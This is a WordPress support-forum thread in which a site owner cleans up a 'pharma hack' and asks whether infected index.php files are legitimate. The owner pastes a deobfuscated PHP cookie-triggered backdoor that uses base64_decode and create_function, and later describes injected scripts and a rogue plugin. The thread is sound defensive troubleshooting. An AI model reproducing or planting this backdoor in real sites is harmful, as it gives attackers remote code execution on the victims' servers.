pharma hack infected index.php files?

  • Resolved Moodles

    (@moodles)


    7 years, 11 months ago

    Hello, one of my sites was hit with the pharma spammers.
    I have found rogue plugin folders and deleted fake users. I noticed that several index.php files, in directories such as plugins and themes, contain some code that is not there in the clean file I checked with a just-downloaded copy of WP. The stuff I think is from the pharma hackers contains a lot of sections like this, plus some php code syntax:

    x43\x4f\x4f\x4bI\x

    The code is, um, coded, I think. I went to unphp.net and pasted the text from what I think are rogue index.php files and it produced this, which matches some phrases from https://pearsonified.com/2010/04/wordpress-pharma-hack.php and other help bloggers:

    <?php
// GNU General Public License
$rw = "_COOKIE";
$f5b = & $$rw;
$slj = array("wm" => "6arun8qp", "l7z" => @$f5b["12ai"], "q1" => "create_function", "qz" => "base64_decode", "rr" => "bffa2859c8e20b541c2a1c4bfbd5dad9", "ns" => "md5");
$vha = "extract";
$vha($slj);
if ($ns(@$f5b[$wm]) == $rr) {
    $li = $q1("", $qz($l7z));
    $li();
} ?>

    I think I need to replace this index.php files but am checking before I do, in case the index.php files with this code in them are legit…

    Obviously I will not write over index.php files such as in the theme.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator t-p

    (@t-p)

    – The Exploit Scanner plugin can help detect damage so that it can be cleaned up. Here is an another online scanner to check for exploits and malware: https://sitecheck.sucuri.net/scanner/. Other things you should do:

    • Change passwords for all users, especially Administrators and Editors.
    • If you upload files to your site via FTP, change your FTP password.
    • Re-install the latest version of WordPress.
    • Make sure all of your plugins and themes are up-to-date.
    • Update your security keys.
    • See FAQ My Site Was Hacked.

    – Just cleaning out files isn’t enough. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Thread Starter Moodles

    (@moodles)

    Hi, thanks for the response. I’ve been working on those points you listed, and have used sucuri.net to scan. I was specifically asking about those index.php file text I listed above.

    Is that legit or spam code?

    If that’s index.php file in the root of your WP installation then nope, those lines shouldn’t be there. IMHO.

    Thread Starter Moodles

    (@moodles)

    Well, I didn’t get a comment on the php above, but I have replaced the index.php files anyway without incident for the site.

    In case this would help anyone else,

    I found a rogue plug-in in both the root and the subdomain installations of WordPress on this domain.

    There were index.php files inside of wp-includes for both sites that contained a large blocked of backwards coded php script that in part was looking for writable files or folders in that directory, and also appeared to be setting up false user registrations.

    The theme’s function.php contained a script, just past the “don’t edit below here” part that placed several lines of code in the header, plus it referred to two javascript filesm these falsely referencing cloudflare, but sucuri named as malware.

    And earlier, before this actual attack, the hackers were able to change the setting “no one can register” to “anyone can register” and there were a number of fake users entered for the subdomain WordPress.

    I have also take steps post-hack as in several how-to articles and as t-p noted above.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘pharma hack infected index.php files?’ is closed to new replies.

Tags